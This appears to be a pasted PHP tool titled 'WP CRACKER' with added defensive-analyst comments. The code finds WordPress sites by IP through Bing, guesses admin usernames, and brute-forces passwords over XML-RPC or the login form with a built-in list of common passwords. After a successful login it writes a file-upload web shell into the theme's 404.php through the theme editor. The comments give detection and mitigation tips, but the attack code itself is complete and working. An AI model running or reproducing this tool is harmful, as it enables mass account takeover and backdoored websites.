M4_HAX0R

WP Cracker

Jan 21st, 2016
<title>WP CRACKER</title>
<style>
body{background-color:#f1f1f1;}
input,select,textarea{
    border:1px solid #4F4F4F; font-family:Verdana; font-size:11px;
}
</style>
<center>
<table cellpadding='5'>
<tr><td align=center><h2>WP CRACKER</h2></td></tr>
<?php
#INJ3CTOR_M4
# Analyst notes (defensive). This page is a WordPress credential-guessing
# panel with a follow-on theme-file write. The code is left as found and
# annotated for detection and mitigation only.
#
# Two modes, selected by the POST field 'brute':
#  - form mode (no 'brute'): optionally takes a server IP, asks Bing for
#    pages on that IP ("ip:<ip> /?page_id=" and "ip:<ip> /?p="), confirms
#    WordPress via /wp-includes/wlwmanifest.xml and pre-fills a target list
#    and a built-in password list;
#  - brute mode ('brute' set): per site, guesses the admin login name
#    (admin_wp), tries every password through XML-RPC (XMLRPC) or the login
#    form (WP_CRACKER), and on success writes a file-upload form into
#    wp-content/themes/twentythirteen/404.php (uploadshell).
#
# Host artifacts wherever this script runs: 'rezult.html' (results log,
# opened in append mode) and 'cookie.txt' (curl cookie jar in the working
# directory). Both are file indicators when triaging a server found hosting
# this panel.
@set_time_limit(0);   # no execution cap: the password loops can run for a long time
error_reporting(0);   # silences every warning/error, so failures leave no trace in logs
 
if(!isset($_POST['brute'])){
    # --- form mode: render the target/password form, optionally pre-filled ---
    echo'<tr><td align="center">';
    echo'<b>Server iP:</b>';
    echo'<form method="POST">';
    echo'<input size="60" type="text" name="ip" placeholder="Put Target Server iP">';
    echo'<input type="submit" value="Grab_WP!"></td></tr></table>';
    echo'<table cellpadding="5">';
    echo'<tr><td align="center"><b>Web-Sites List</b></td><td align="center"><b>Passwords</b></td></tr>';
    if(!isset($_POST['ip'])){
        echo'<tr><td align="center"><textarea name="sites" cols="32" rows="23" placeholder="http://localhost/"></textarea></td>';
    }else{
        # Target discovery by IP: every tenant of a shared IP is a candidate,
        # so one weak site on a shared host exposes its neighbours to this loop.
        $ip = trim($_POST['ip']);
        $dorks = array('/?page_id=', '/?p=');
        foreach($dorks as $dork){
            $query = "ip:$ip $dork";
            $allLinks = bingServerCrawler($query);
            foreach($allLinks as $link){
                if(eregi("page_id=|p=", $link)){    $link = pathinfo($link)['dirname'];
                    # WordPress fingerprint: a GET for /wp-includes/wlwmanifest.xml
                    # (sent with the Googlebot UA from get_source) is an early,
                    # low-noise indicator of this tool in web-server logs.
                    $data = get_source($link    .   "/wp-includes/wlwmanifest.xml");
                    if(preg_match('#<clientType>WordPress</clientType>#i', $data)){
                        $wpLinks[] = $link;
                    }
                }
            }
        }
        if(!empty($wpLinks)){   $wpLinks = array_unique($wpLinks);
            echo'<tr><td align="center"><textarea name="sites" cols="32" rows="23">';
            foreach($wpLinks as $wordpress){
                echo $wordpress ."\r\n";
            }
            echo'</textarea></td>';
        }else{
            echo'<tr><td align="center"><textarea name="sites" cols="32" rows="23" placeholder="http://localhost/"></textarea></td>';
        }
    }
    # Built-in guess list. It is short and consists of well-known defaults;
    # any account still accepting one of these is the exposure the tool relies
    # on. A password policy plus login lockout/MFA removes it entirely.
    echo'<td><textarea name="passwords" cols="32" rows="23">';
echo'
00000
000000
0000000
00000000
0123456789
102030
111111
112233
123
123123
12345
123456
1234567
12345678
123456789
321321
654321
admin
adminadmin
admin123
admin123123
admin1234
admin123456
administrator
abc123
demo
qwerty
qwerty123
passwd
password
p@ssw0rd
passw0rd
passwords
pass123
pass121
pass
pass1234
test
test123
root
toor
user
welcome1
welcome
';
    echo'</textarea></td></tr></table>';
    echo'<table cellpadding="5">';
    echo'<tr><td align="center"><input type="submit" name="brute" value="Start BruteForce!"/></form></td></tr></table>';
}else{
    # --- brute mode: one site per line, one password per line, CRLF-separated ---
    $sites = array_unique(array_map("trim", explode("\r\n", $_POST['sites'])));
    $passwords = array_unique(array_map("trim", explode("\r\n", $_POST['passwords'])));
    $f = fopen('rezult.html', 'a+');   # results log (host artifact, see notes above)
    echo'<table border="1" cellpadding="5">';
    foreach($sites as $site){
        $site = rtrim($site, '/');
        vbflush(); # buffer clean
        echo"<tr><td><b>Target --> $site</b></td></tr>";
        fwrite($f, "<br />target --> <b>$site</b><br />");
        $user = admin_wp($site);
        echo"<tr><td>Username is: <b>$user</b></td>";
        fwrite($f, "Username: <b>$user</b><br />");
        # Route selection: a GET of /xmlrpc.php is expected to answer with the
        # "server accepts POST" text when XML-RPC is enabled; if so the faster
        # XML-RPC path is used, otherwise the wp-login.php form. Disabling
        # XML-RPC when unused (WordPress 'xmlrpc_enabled' filter) removes the
        # first path; lockout/rate limiting and MFA cover both.
        $xmlprc = get_source($site  .'/xmlrpc.php');
        if(preg_match('#server accepts POST#i', $xmlprc)){
            foreach($passwords as $pass){
                if(XMLRPC($site, $user, $pass) == true){
                    vbflush(); # buffer clean
                    echo"<tr><td><b><font color='green'>Password is: $pass</font></b></td></tr>";
                    fwrite($f, "Password: <b>$pass</b><br />");
                    # Post-auth step: theme-editor write into twentythirteen/404.php.
                    if(uploadshell($site) == true){
                        echo"<tr><td><b><font color='green'>Shell Uploaded: $site/wp-content/themes/twentythirteen/404.php</font></b></td></tr>";
                        fwrite($f, "Shell: <b>$site/wp-content/themes/twentythirteen/404.php</b><br />");
                    }else{
                        echo'<tr><td><font color="red">Can\'t Upload Shell!</font></td></tr>';
                    }
                    break;
                }else{
                    vbflush(); # buffer clean
                    echo"<tr><td><font color='red'>$pass NO!</font></td></tr>";
                }
            }
        }else{
            foreach($passwords as $pass){
                if(WP_CRACKER($site, $user, $pass) == true){
                    vbflush(); # buffer clean
                    echo"<tr><td><b><font color='green'>Password is: $pass</font></b></td></tr>";
                    fwrite($f, "Password: <b>$pass</b><br />");
                    # Same post-auth step as in the XML-RPC branch.
                    if(uploadshell($site) == true){
                        echo"<tr><td><b><font color='green'>Shell Uploaded: $site/wp-content/themes/twentythirteen/404.php</font></b></td></tr>";
                        fwrite($f, "Shell: <b>$site/wp-content/themes/twentythirteen/404.php</b><br />");
                    }else{
                        echo'<tr><td><font color="red">Can\'t Upload Shell!</font></td></tr>';
                    }
                    break;
                }else{
                    vbflush(); # buffer clean
                    echo"<tr><td><font color='red'>$pass NO!</font></td></tr>";
                }
            }
        }
        fclose($f);
    }
}
echo'</table>';
  156.  
  157. // Functions //
  158.  
function bingServerCrawler($dork){
    # Collects result links from Bing for the given query string, paging with
    # the 'first' parameter in steps of 10 until no "sw_next" element is seen.
    # Returns the de-duplicated links, or nothing (null) when no link matched.
    # Note for defenders: this request goes to Bing, not to the target; the
    # handset-style User-Agent below is therefore not an indicator on the
    # victim side. Targeting happens purely by the caller's "ip:" query.
    $ch = curl_init();
    $i = 1;
    while($i){
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_URL, "http://www.bing.com/search?q="   .   urlencode($dork)    .   "&first={$i}");
        curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');   # shared cookie jar in the working directory
        curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
        curl_setopt($ch, CURLOPT_USERAGENT, "SamsungI8910/SymbianOS/9.1 Series60/3.0");
        curl_setopt($ch, CURLOPT_ENCODING, "gzip, deflate, compress");
        $data = curl_exec($ch);
        # Result links are scraped from '<h2><a href="...">' markup.
        preg_match_all('#<h2><a href="(.*?)"#i', $data, $matches);
        foreach($matches[1] as $link){
            $allLinks[] = $link;
        }
        if(!preg_match('#<div class="sw_next">#i', $data)) break;   # no further page
        $i+=10;
    }
    curl_close($ch);
    if(!empty($allLinks) && is_array($allLinks)){
        return array_unique($allLinks);
    }
}
  182.  
function get_source($link, $safemode = false, $agent){
    # Fetches a URL and returns the response body (curl_exec's return value,
    # so false on transport failure; file_get_contents' when curl is absent).
    # Every fingerprint, username-discovery and shell-verification request in
    # this script goes through here.
    #   $link     URL to fetch
    #   $safemode when true, sleeps one second before the request
    #   $agent    User-Agent to send; when falsy, a Googlebot impersonation
    #             string is used. For defenders: a "Googlebot" UA arriving
    #             from an address that does not verify as Google's crawler
    #             is a practical alerting rule for this family of tools.
    if($safemode === true) sleep(1);
    if(!$agent){ $agent='Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'; }
    if(!function_exists('curl_init')){
        return file_get_contents($link);   # fallback when the curl extension is not loaded
    }else{
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch, CURLOPT_URL, $link);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);   # TLS certificate verification disabled
        curl_setopt($ch, CURLOPT_USERAGENT, $agent);
        curl_setopt($ch, CURLOPT_ENCODING, 0);
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
        $data = curl_exec($ch);
        curl_close($ch);
       
        return $data;
    }
}
  203.  
function admin_wp($wp){
    # Username discovery for a WordPress site. Two public sources are read:
    #  1. the Atom feed (/?feed=atom): the first <name> element is taken if it
    #     is 1..15 characters long (when the match succeeds but the length
    #     check fails the function falls through without a return value);
    #  2. otherwise the author archive for user id 1 (/?author=1): the login
    #     slug is read from the 'author-<slug>' body class.
    # Falls back to the literal "admin".
    # Mitigation: do not use 'admin' as a login, and be aware that author
    # archives and feed author names expose the values this function reads.
    $data = get_source($wp    .    "/?feed=atom");
    if(preg_match('#<name>(.*?)</name>#', $data, $user)){
        if(strlen($user[1]) > 0 && strlen($user[1]) <= 15){
            return $user[1];
        }
    }else{
        $data = get_source($wp    .    "/?author=1");
        if(preg_match('#<body class="archive author author-(.*?) author-(.*?)(.*)">#i', $data, $user)){
            return $user[1];
        }else{
            return "admin";
        }
    }
}
  219.  
function XMLRPC($site, $user, $pass){
    # One credential attempt through the XML-RPC endpoint: POSTs a
    # wp.getUsersBlogs call carrying $user/$pass and reports true when the
    # response contains '<name>isAdmin</name>' (present in a successful
    # getUsersBlogs reply). The cookie jar is shared with uploadshell().
    # Detection: bursts of POSTs to /xmlrpc.php whose bodies contain
    # wp.getUsersBlogs with a fixed username and varying passwords, from one
    # source, under a "Googlebot" UA. Mitigation: disable XML-RPC when unused
    # ('xmlrpc_enabled' filter), throttle failed authentications, enforce MFA.
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $site    ."/xmlrpc.php");
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);   # TLS certificate verification disabled
    curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)");
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
    curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()    .'/cookie.txt');
    curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()   .'/cookie.txt');
    curl_setopt($ch, CURLOPT_POST, 1);
    # Credentials are interpolated raw into the XML body (no escaping).
    curl_setopt($ch, CURLOPT_POSTFIELDS, "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>$user</string></value></param><param><value><string>$pass</string></value></param></params></methodCall>");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    $data = curl_exec($ch);
    curl_close($ch);
    return (preg_match('#<name>isAdmin</name>#i', $data)) ? true:false;
}
  236.  
function WP_CRACKER($site, $user, $pass){
    # One credential attempt through the standard wp-login.php form. Success
    # is inferred from the substring 'logout' in the page reached after
    # following redirects to /wp-admin/ (presumably the dashboard's logout
    # link). The cookies obtained here are stored in cookie.txt and reused
    # by uploadshell().
    # Detection: repeated POSTs to wp-login.php from one source with a fixed
    # 'log' value and varying 'pwd', under a "Googlebot" UA. Mitigation:
    # login lockout / rate limiting and MFA.
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $site .'/wp-login.php');
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);   # TLS certificate verification disabled
    curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)");
    curl_setopt($ch, CURLOPT_COOKIE, "wordpress_test_cookie=WP+Cookie+check");
    curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()   .'/cookie.txt');
    curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()    .'/cookie.txt');
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, "log={$user}&pwd={$pass}&wp-submit=Log+In&redirect_to={$site}/wp-admin/&testcookie=1");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    $data = curl_exec($ch);
    curl_close($ch);
    return (preg_match('/logout/', $data)) ? true:false;
}
  253.  
function uploadshell($site){
    # Post-authentication persistence via the built-in theme editor, using
    # the session cookies saved by XMLRPC()/WP_CRACKER():
    #  1. GET theme-editor.php for twentythirteen/404.php and read the
    #     '_wpnonce' value from the form;
    #  2. POST the editor with action=update, replacing 404.php with the
    #     URL-encoded 'newcontent' below (a PHP file-upload form whose output
    #     starts with the marker 'Uploader By INJ3CTOR_M4');
    #  3. GET the theme's 404.php and report true if the marker is present.
    # Returns false when no nonce was found (not logged in, editor disabled).
    # Mitigation: define('DISALLOW_FILE_EDIT', true) in wp-config.php makes
    # step 2 impossible; file-integrity monitoring on wp-content/themes catches
    # the write. Detection/IR: POSTs to wp-admin/theme-editor.php with
    # action=update&file=404.php; a recently modified twentythirteen/404.php;
    # theme files containing the marker string or move_uploaded_file().
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $site    .'/wp-admin/theme-editor.php?file=404.php&theme=twentythirteen');
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);   # TLS certificate verification disabled
    curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)");
    curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()   .'/cookie.txt');
    curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()    .'/cookie.txt');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $data = curl_exec($ch);
    curl_close($ch);
    if(preg_match('#name="_wpnonce" value="(.*?)"#', $data, $token)){
        # Editor form fields; 'newcontent' is the file body written to 404.php.
        $post = "_wpnonce={$token[1]}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Ftheme-editor.php%3Ffile%3D404.php%26theme%3Dtwentythirteen%26scrollto%3D0%26updated%3Dtrue&newcontent=%3C%3Fphp%0Aecho%20%27Uploader%20By%20INJ3CTOR_M4%27%3B%0Aecho%27%0A%3Cform%20method%3D%22post%22%20enctype%3D%22multipart%2fform-data%22%3E%0A%3Cinput%20name%3D%22file%22%20type%3D%22file%22%20%2f%3E%0A%3Cinput%20name%3D%22path%22%20type%3D%22text%22%20value%3D%22%27.getcwd%28%29.%27%22%20%2f%3E%0A%3Cinput%20type%3D%22submit%22%20value%3D%22Up%22%20%2f%3E%0A%3C%2fform%3E%0A%27%3B%0Aif%28isset%28%24_FILES%5B%27file%27%5D%29%20%26%26%20isset%28%24_POST%5B%27path%27%5D%29%29%7B%0A%20%20%20%20if%28move_uploaded_file%28%24_FILES%5B%27file%27%5D%5B%27tmp_name%27%5D%2C%24_POST%5B%27path%27%5D.%27%2f%27.%24_FILES%5B%27file%27%5D%5B%27name%27%5D%29%29%7B%0A%20%20%20%20%20%20%20%20echo%20%27%3Cfont%20color%3D%22green%22%3EFile%20Upload%20Done.%3C%2ffont%3E%3Cbr%20%2f%3E%27%3B%0A%20%20%20%20%7Delse%7B%0A%20%20%20%20%20%20%20%20echo%20%27%3Cfont%20color%3D%22red%22%3EFile%20Upload%20Error.%3C%2ffont%3E%3Cbr%20%2f%3E%27%3B%0A%20%20%20%20%7D%0A%7D%0A%3F%3E&action=update&file=404.php&theme=twentythirteen&scrollto=0&docs-list=&submit=Update+File";
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $site    .'/wp-admin/theme-editor.php');
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)");
        curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()   .'/cookie.txt');
        curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()    .'/cookie.txt');
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $data = curl_exec($ch);
        curl_close($ch);
        # Verification fetch: the marker string is the file-content indicator.
        $data = get_source($site    .'/wp-content/themes/twentythirteen/404.php');
        return (preg_match('/Uploader By INJ3CTOR_M4/', $data)) ? true:false;
    }else{  return FALSE;   }
}
  281.  
function vbflush(){
    # Pushes buffered output to the client so the progress table renders
    # while the password loops run. The presence of 'ob_gzhandler' among the
    # active output handlers is detected once (memoised in a static local);
    # when it is present the output buffer is not flushed at all.
    static $gzip_handler = null;
    if($gzip_handler === null){
        $gzip_handler = false;
        $output_handlers = ob_list_handlers();
        if(is_array($output_handlers)){
            foreach($output_handlers as $handler){
                if($handler == 'ob_gzhandler'){
                    $gzip_handler = true;
                    break;
                }
            }
        }
    }
    if($gzip_handler){
    // forcing a flush with this is very bad
        return;
    }
    if(ob_get_length() !== false){   # only when an output buffer is active
        @ob_flush();
    }
    flush();
}